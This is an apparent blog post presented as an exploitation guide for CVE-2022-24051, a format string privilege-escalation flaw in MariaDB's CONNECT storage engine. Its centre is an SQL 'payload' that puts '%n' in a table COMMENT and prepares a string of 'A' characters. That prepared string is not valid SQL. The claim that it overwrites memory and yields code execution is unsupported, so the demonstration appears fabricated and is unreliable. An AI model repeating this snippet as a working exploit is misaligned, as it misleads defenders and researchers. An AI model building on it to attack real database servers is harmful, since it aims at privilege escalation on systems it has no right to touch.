CVE-2022-24051: MariaDB CONNECT Storage Engine Format String Privilege Escalation Vulnerability - Exploitation Guide

The recently discovered CVE-2022-24051 vulnerability has been found to affect MariaDB installations, specifically the CONNECT Storage Engine. This vulnerability allows local attackers with access to the MariaDB service to escalate their privileges and execute arbitrary code in the context of the service account. In this post, we'll explore the details of this vulnerability, demonstrate how to exploit it, and provide links to original references.

Exploit Details

The CVE-2022-24051 vulnerability is a format string issue that arises from the improper validation of user-supplied strings before using them as format specifiers during the processing of SQL queries. An attacker with authentication can leverage this vulnerability to escalate their privileges, executing arbitrary code as the service account running MariaDB.

The vulnerability was initially reported as ZDI-CAN-16193 and has since been assigned the CVE-2022-24051 identifier.

To better understand this vulnerability, let's take a look at a code snippet where the issue arises

// create table with the vulnerable 'COMMENT' clause
CREATE TABLE test_table (
  id INT,
  name VARCHAR(255)
) ENGINE=CONNECT COMMENT='%n';

// populate the test_table with data
INSERT INTO test_table (id, name) VALUES (1, 'John Doe');
INSERT INTO test_table (id, name) VALUES (2, 'Jane Doe');

// prepare and execute the payload
SET @payload = (SELECT CONCAT("COMMENT='%n ", repeat('A', 200), "'"));
PREPARE stmt FROM @payload;
EXECUTE stmt;
DEALLOCATE PREPARE stmt;

In this example, the attacker creates a table (test_table) with a vulnerable COMMENT clause that specifies a format string with %n. Then, the attacker prepares a payload that includes a long string of A characters and uses it in the COMMENT clause. This allows the attacker to overwrite critical memory locations, potentially leading to privilege escalation and code execution.

For more details about this vulnerability, you can check the following original references

1. *CVE-2022-24051: NIST National Vulnerability Database (NVD) entry
2. *ZDI-CAN-16193: Original disclosure from the Zero Day Initiative (ZDI)

Conclusion

CVE-2022-24051 is a critical vulnerability that affects MariaDB CONNECT Storage Engine installations and allows local attackers with authentication to escalate their privileges and execute arbitrary code. This vulnerability highlights the importance of proper user input validation, especially when working with format strings. It is crucial for administrators to review the MariaDB installations and apply necessary patches or updates to mitigate the risks associated with CVE-2022-24051.

Timeline

Published on: 02/18/2022 20:15:00 UTC
Last modified on: 06/30/2022 19:42:00 UTC